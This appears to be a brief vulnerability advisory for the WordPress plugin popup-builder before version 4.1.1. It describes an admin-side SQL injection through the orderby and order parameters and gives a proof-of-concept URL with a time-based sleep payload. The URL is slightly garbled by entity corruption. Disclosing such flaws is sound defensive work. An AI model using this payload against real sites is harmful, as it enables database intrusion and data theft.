The plugin does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection
https://example.com/wp-admin/admin-post.php?action=csv_file&orderby;=email%2C(select+*+from(select(sleep(5)))b)ℴ=desc
CPE | Name | Operator | Version |
---|---|---|---|
popup-builder | lt | 4.1.1 |